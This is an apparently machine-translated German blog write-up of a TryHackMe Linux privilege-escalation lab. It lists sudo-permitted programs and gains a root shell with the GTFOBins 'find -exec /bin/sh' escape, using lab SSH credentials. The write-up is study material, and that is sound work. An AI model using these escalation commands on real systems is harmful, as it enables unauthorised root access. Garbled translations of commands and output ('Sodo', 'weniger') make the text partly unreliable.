[Tryhackme] Verbesserung des Privilegs mit GTFOBINS! Linux privesc schreiben Teil 3

[Tryhackme] Verbesserung des Privilegs mit GTFOBINS! Linux Privesc Writepu Teil 3

Dieses Mal werden wir versuchen, Privilegien mit "GTFOBINS" zu eskalieren.
Die Zielmaschine nutzt den Raum unten von TryHackme.
"Tryhackme-linux privesc: https://tryhackme.com/room/linuxprivesc "


Dieser Artikel ist Teil 3.
Wenn Sie die Schreiben für Linux Privesc mit TryHackme überprüfen möchten, überprüfen Sie bitte auch Erhöhung der Berechtigungen mit gefährdeten Dateiberechtigungen unter Linux

Bitte beachten Sie, dass die Erklärung Spoiler sind.

Empfohlene Nachschlagewerke
\Amazon Prime Day ist jetzt im Gange! /
Amazonas
Autor: Ipusiron
¥3,850 (Ab 21:11 am 07.08.2025 | Amazon Research)
\Amazon Prime Day ist jetzt im Gange! /
Amazonas
Autor: Justin Seitz, Autor: Tim Arnold, überwacht von: Mantani Nobutaka, Übersetzung: Arai Yu, Übersetzung: Kakara Hirosei, Übersetzung: Murakami Ryo
¥3,520 (Ab 12:26 am 07.09.2025 | Amazon Research)
\Amazon Prime Day ist jetzt im Gange! /
Amazonas
Inhaltsverzeichnis

Vorbereitung

Starten der Zielmaschine

Starten Sie zuerst die Zielmaschine.
"Tryhackme-linux privesc: https://tryhackme.com/room/linuxprivesc bei

Wenn die IP -Adresse so angezeigt wird, ist das Booten in Ordnung.

SSH -Verbindung

Stellen Sie eine Verbindung zu der Zielmaschine her, die Sie mit SSH begonnen haben.
Wie erläutert, ist es in Ordnung, solange Sie mit "Benutzer: password321" eine Verbindung herstellen können.

└─ $ ssh user@10.10.6.35 Die Authentizität von Host '10 .10.6.35 (10.10.6.35) kann nicht festgelegt werden. DSA -Schlüsselfingerabdruck ist SHA256: p2nSSfvyjvk1qe0TSNX5G2H8AAWYRN71JDZ3UEODBMA. Dieser Schlüssel ist in keinen anderen Namen bekannt. Sind Sie sicher, dass Sie sich weiter verbinden möchten (ja/nein/[Fingerabdruck])? Ja Warnung: Dauerhaft '10 .10.6.35 '(DSA) in die Liste der bekannten Hosts hinzugefügt. user@10.10.6.35's Passwort: Linux Debian 2.6.32-5-AMD64 #1 SMP TUE 13. Mai 16:34:35 UTC 2014 x86_64 Die mit dem Debian GNU/Linux-System enthaltenen Programme sind kostenlose Software. Die genauen Verteilungsbegriffe für jedes Programm werden in den einzelnen Dateien in/usr/share/doc/*/copyright beschrieben. Debian GNU/Linux verfügt über eine Garantie, sofern dies nach geltendem Recht zulässig ist. Letzte Login: Fr 15. Mai 06:41:23 2020 von 192.168.1.125 Benutzer@Debian: ~ $ sudo -l Matching -Standardeinträge für den Benutzer auf diesem Host: env_reset, env_keep+= ld_preload, env_keep+= ld_library_path

Möglicherweise müssen Sie "-OHostKeyAlgorithmen =+SSH-RSA" hinzufügen.

Erhöhung des Privilegs mit GTFOBINs

Jetzt möchte ich versuchen, Privilegien mit GTFOBINs zu eskalieren.

Wie viele Programme darf „Benutzer“ über sudo ausgeführt werden? (Wie viele Programme gibt es Programme, die "Benutzer" über sudo ausgeführt werden können?)

Zunächst möchte ich ein Programm erhalten, das Benutzer in Sodo ausführen können.
Der Befehl ist "Sodo -l".

user@debian:~$ sudo -l Matching Defaults entries for user on this host: env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH User user may run the following commands on this host: (root) NOPASSWD: /usr/sbin/iftop (root) NOPASSWD: /usr/bin/find (root) NOPASSWD: /usr/bin/nano (root) nopasswd:/usr/bin/vim (root) nopasswd:/usr/mAN (root) nopasswd:/usr/bin/awk (root) nopasswd:/usr/bin/weniger (root) nopasswd:/usr/bin/ftp (root) nopasswd. Nopasswd:/usr/sbin/apache2 (root) nopasswd:/bin/mehr

Ich fand, dass die oben genannten 11 Programme in Sodo ausgeführt werden können.

Ein Programm auf der Liste hat keine Shell Escape -Sequenz auf GTFOBINs. Was ist das?

Suchen Sie als nächstes nach Programmen, die keine Shell -Fluchtsequenz haben.
(Ich denke, es ist wie die Suche nach einem Programm mit einer Shell Escape -Sequenz.)

Als ich nach jedem suchte, stellte ich fest, dass es kein "Apache2" gab.

Die Antwort lautet "Apache2".

Versuchen Sie, Privilegien mit GTFOBINs zu erhöhen

Lassen Sie uns nun versuchen, ihre Privilegien tatsächlich zu eskalieren.
Es sollte möglich sein, wenn die oben aufgeführten Elemente anders als "Apache2" sind. Diesmal werde ich es mit Find versuchen.

Suchen Sie zuerst nach Sodo und sehen Sie sich Sodo an.

Es scheint nur eine Frage der Ausführung des Befehls, also werde ich versuchen, ihn zu implementieren.

Benutzer@debian: ~ $ sudo find. -exec /bin /sh \; -quit sh-4.1# Whoami Root

Ich habe bestätigt, dass ich tatsächlich zur Wurzel erhöht wurde.
Es ist wirklich einfach. . . Ist es in Ordnung, so einfach zu sein? . .

Zusammenfassung

Dieses Mal haben wir versucht, Privilegien mit "GTFOBINS" zu eskalieren.
Es war ein bisschen enttäuschend, weil es sehr einfach war, Privilegien zu eskalieren, aber es scheint, als könnte es verwendet werden.

Referenzen und Websites

Medium ( Shamsher Khan ): https://infosecwriteups.com/linux-privesc-tryhackme-writeup-bf4e32460ee5

Teilen Sie, wenn Sie möchten!

Wer hat diesen Artikel geschrieben

Dies ist ein Blog, in dem ich angefangen habe, Informationssicherheit zu studieren. Als neuer Angestellter würde ich mich freuen, wenn Sie mit einem breiten Herzen schauen könnten.
Es gibt auch Teech Lab, das eine Gelegenheit ist, Programmierspaß zu studieren. Wenn Sie also an der Softwareentwicklung interessiert sind, sollten Sie sich unbedingt ansehen!

Inhaltsverzeichnis